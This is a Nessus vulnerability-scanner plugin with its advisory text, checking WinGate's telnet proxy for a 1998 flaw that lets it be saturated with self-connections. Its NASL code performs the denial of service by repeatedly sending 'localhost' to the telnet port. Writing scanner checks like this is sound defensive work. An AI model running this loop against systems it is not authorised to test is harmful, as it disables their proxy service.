WinGate Telnet Proxy localhost Connection Saturation DoS

1999-06-22T00:00:00
ID WINGATE_DENIAL.NASL
Type nessus
Reporter Tenable
Modified 2018-11-15T00:00:00

Description

The remote Wingate service can be forced to connect to itself continually until it runs out of buffers. When this happens, the telnet proxy service will be disabled.

An attacker may block your telnet proxy this way, thus preventing your system from working properly if you need telnet. An attacker may also use this flaw to force your systems to use another proxy which may be under the attacker's control.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include( 'compat.inc' );

if(description)
{
 script_id(10310);
 script_version ("1.26");
 script_cve_id("CVE-1999-0290");

 script_name(english:"WinGate Telnet Proxy localhost Connection Saturation DoS");
 script_summary(english:"Determines if Wingate is vulnerable to a buffer attack");

  script_set_attribute(
    attribute:'synopsis',
    value:'The remote proxy is vulnerable to denial of service.'
  );

  script_set_attribute(
    attribute:'description',
    value:"The remote Wingate service
can be forced to connect to itself continually
until it runs out of buffers. When this happens,
the telnet proxy service will be disabled.

An attacker may block your telnet proxy this
way, thus preventing your system from working
properly if you need telnet. An attacker may also
use this flaw to force your systems to use another
proxy which may be under the attacker's control."
  );

  script_set_attribute(
    attribute:'solution',
    value: "Configure WinGate so that only authorized users can use it."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");

  script_set_attribute(
    attribute:'see_also',
    value:'https://seclists.org/bugtraq/1998/Feb/86'
  );


 script_set_attribute(attribute:"plugin_publication_date", value: "1999/06/22");
 script_set_attribute(attribute:"vuln_publication_date", value: "1998/02/21");
 script_cvs_date("Date: 2018/11/15 20:50:29");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:qbik:wingate");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
  script_family(english:"Windows");
  script_dependencie("find_service1.nasl", "wingate.nasl");
  script_require_keys("wingate/enabled");
  script_require_ports("Services/telnet", 23);
  exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");

wingate = get_kb_item("wingate/enabled");
if(!wingate)exit(0);

port = get_service(svc:"telnet", default: 23, exit_on_fail: 1);

soc = open_sock_tcp(port);
if (! soc) exit(1);

flaw = 0;
for(i=0;i<5000;i=i+1)
{
 buffer = recv(socket:soc, length:8);
 b = 'localhost\r\n';
 send(socket:soc, data:b);
 r = recv(socket:soc, length:1024);
 for(i=0;i<11;i=i+1)d = recv(socket:soc, length:1);
 r = recv(socket:soc, length:100);
 r = tolower(r);
 if(("buffer" >< r)){
	i = 5001;
	security_warning(port);
	}
  }
close(soc);